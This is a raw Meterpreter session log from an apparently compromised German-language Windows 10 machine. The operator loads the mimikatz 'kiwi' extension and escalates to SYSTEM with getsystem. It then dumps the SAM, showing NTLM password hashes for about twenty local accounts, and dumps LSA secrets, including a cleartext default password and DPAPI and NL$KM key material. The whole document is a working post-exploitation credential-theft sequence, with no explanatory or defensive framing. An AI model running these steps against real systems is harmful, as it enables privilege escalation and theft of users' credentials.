meterpreter > sysinfo Computer : PDB42001 OS : Windows 10 (Build 17134). Architecture : x64 System Language : de_DE Domain : SPE Logged On Users : 1 Meterpreter : x86/windows meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.1.1 20180925 (x86/windows) .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ [!] Loaded x86 Kiwi on an x64 architecture. Success. meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT-AUTORITÄT\SYSTEM meterpreter > lsa_dump_sam [+] Running as SYSTEM [*] Dumping SAM Domain : WIN-10 SysKey : cb817619890661aaad841f4d8fea1fea Local SID : S-1-5-21-3370639470-3712607899-531591615 SAMKey : e38ac807655642957b7bd58720730ce2 RID : 000001f4 (500) User : Administrator RID : 000001f5 (501) User : Gast RID : 000001f7 (503) User : DefaultAccount RID : 000003e9 (1001) User : User1 Hash NTLM: 92937945b518814341de3f726500d4ff RID : 000003ea (1002) User : user2 Hash NTLM: 878d8014606cda29677a44efa1353fc7 RID : 000003eb (1003) User : user3 Hash NTLM: f5f22e80c142bbf35cef8a92bdc93578 RID : 000003ec (1004) User : user4 Hash NTLM: 2d20d252a479f485cdf5e171d93985bf RID : 000003ed (1005) User : user5 Hash NTLM: 6757066fdab90200f97ed2412022bd95 RID : 000003ee (1006) User : user6 Hash NTLM: 439b7c9df428792c7b8962e981441f94 RID : 000003ef (1007) User : user7 Hash NTLM: b9561328b5c1c1c461db45e6f29c0116 RID : 000003f0 (1008) User : user10 Hash NTLM: 92e56a700458da8fef6fddb701cf2aa1 RID : 000003f1 (1009) User : user11 Hash NTLM: c2ae1fe6e648846352453e816f2aeb93 RID : 000003f2 (1010) User : user12 Hash NTLM: 58738afe30e5a9a9475512373122787f RID : 000003f3 (1011) User : user13 Hash NTLM: 98c68d494c8f1f5e69e6de5d12773e42 RID : 000003f4 (1012) User : user14 Hash NTLM: 751721a3c9db8fcf51ea120135c337b3 RID : 000003f5 (1013) User : user20 Hash NTLM: d989ef70a522e2f10335d9c8817e7ce8 RID : 000003f6 (1014) User : user21 Hash NTLM: 7a21db80d0536faa274cb5af5f625920 RID : 000003f7 (1015) User : user22 Hash NTLM: cbae45a3c0fa281ea1c918a881273959 RID : 000003f8 (1016) User : user23 Hash NTLM: e7396c46b9203a09a495b7b4a4baa652 RID : 000003f9 (1017) User : user24 Hash NTLM: e029d1342517fa9d6da2cf006493a2e4 meterpreter > lsa_dump_secrets [+] Running as SYSTEM [*] Dumping LSA secrets Domain : WIN-10 SysKey : cb817619890661aaad841f4d8fea1fea Local name : WIN-10 ( S-1-5-21-3370639470-3712607899-531591615 ) Domain name : WORKGROUP Policy subsystem is : 1.13 LSA Key(s) : 1, default {f410e79f-99f5-23df-5f81-2899d7ce4e7a} [00] {f410e79f-99f5-23df-5f81-2899d7ce4e7a} b9f9156c3ef8ebc9ad483064aaeee482124d448fa9e947d62bb15c4aaccfa09b Secret : DefaultPassword old/text: Klartext-Admin-Passwort Secret : DPAPI_SYSTEM cur/hex : 01 00 00 00 50 ca 98 f3 67 93 02 fa a5 4f 54 ed da e2 67 7c 7c ac 2f 15 e3 9b 64 9f f1 55 61 02 d8 b4 a2 36 b4 d6 56 ba 87 4b 11 a3 full: 50ca98f3679302faa54f54eddae2677c7cac2f15e39b649ff1556102d8b4a236b4d656ba874b11a3 m/u : 50ca98f3679302faa54f54eddae2677c7cac2f15 / e39b649ff1556102d8b4a236b4d656ba874b11a3 old/hex : 01 00 00 00 cd 7f 8d 5b bb 89 cf ff cd 89 d7 87 a9 5f 75 b6 1a d1 f1 6a 08 f1 b6 01 62 7e 33 ea a3 2c d2 d8 f2 f8 0d 17 d7 13 6f e9 full: cd7f8d5bbb89cfffcd89d787a95f75b61ad1f16a08f1b601627e33eaa32cd2d8f2f80d17d7136fe9 m/u : cd7f8d5bbb89cfffcd89d787a95f75b61ad1f16a / 08f1b601627e33eaa32cd2d8f2f80d17d7136fe9 Secret : NL$KM cur/hex : c7 51 24 73 8e f9 b3 2a dd b7 2a 06 ea 00 2a 17 af a9 ce f4 f3 14 2c a0 a9 cc 8f a9 ad 7e 4f 4b 4d 9d f0 1b 12 bd f3 b4 05 04 d9 e4 6d f5 24 6d 80 fb a9 3e 7b 43 f5 4d e8 45 5b 36 30 3e 52 3e old/hex : c7 51 24 73 8e f9 b3 2a dd b7 2a 06 ea 00 2a 17 af a9 ce f4 f3 14 2c a0 a9 cc 8f a9 ad 7e 4f 4b 4d 9d f0 1b 12 bd f3 b4 05 04 d9 e4 6d f5 24 6d 80 fb a9 3e 7b 43 f5 4d e8 45 5b 36 30 3e 52 3e meterpreter >